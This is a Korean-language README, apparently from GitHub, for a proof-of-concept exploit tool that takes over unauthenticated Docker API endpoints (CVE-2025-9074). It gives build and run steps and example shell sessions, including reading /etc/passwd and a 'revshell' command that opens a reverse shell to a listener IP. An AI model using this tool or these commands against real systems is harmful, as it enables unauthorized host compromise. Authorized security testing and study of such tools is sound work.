
Docker API CVE-2025-9074 PoC (Proof-Of-Concept). 인증되지 않은 Docker API 엔드포인트를 대상으로 하는 통합 대화형 명령 셸을 갖춘 CVE-2025-9074용 정교한 익스플로잇 프레임워크.
인증되지 않은 Docker API 엔드포인트를 대상으로 하는 정교한 익스플로잇 프레임워크로, 통합된 대화형 명령 셸이 포함되어 있습니다.
이 도구는 인증 없이 노출된 Docker API 인스턴스를 자동으로 익스플로잇하여 대상 호스트에서 전체 컨테이너 생성 및 명령 실행을 가능하게 합니다. 사용자 정의 대화형 셸을 제공하여 사후 익스플로잇 작업을 원활하게 수행할 수 있습니다.
참고: 이는 사용자 정의 PoC 구현입니다. 저는 CVE-2025-9074를 발견하지 않았습니다.

취약점 자동 탐지, 이미지 가져오기, 컨테이너 생성 및 초기화

명령 실행 기능을 갖춘 사후 익스플로잇 셸
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
또는 Releases에서 바이너리를 다운로드할 수 있습니다.
./poc-2025-9074
기본 대상(127.0.0.1:2375)에 대해 실행:
./poc-2025-9074
사용자 지정 Docker API 엔드포인트를 지정:

성공적인 익스플로잇 후, 대화형 셸에서 다음 명령을 사용할 수 있습니다:
| 명령어 | 설명 |
|---|---|
cmd <command> | 컨테이너 내에서 임의 명령 실행 |
revshell <ip> <port> | 지정된 리스너에 리버스 셸 배포 |
info | 현재 컨테이너 및 대상 정보 표시 |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074는 적절한 인증 메커니즘이 없는 노출된 Docker API 엔드포인트를 가진 인스턴스에 영향을 미칩니다. 이 잘못된 구성은 Docker 데몬에 대한 무단 액세스를 허용하여 다음을 가능하게 합니다:
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
xwpd (@xwpdx0)
MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하세요.
책임 있는 공개 및 보안 연구 목적으로만 사용하십시오.
exit | 대화형 세션 종료 |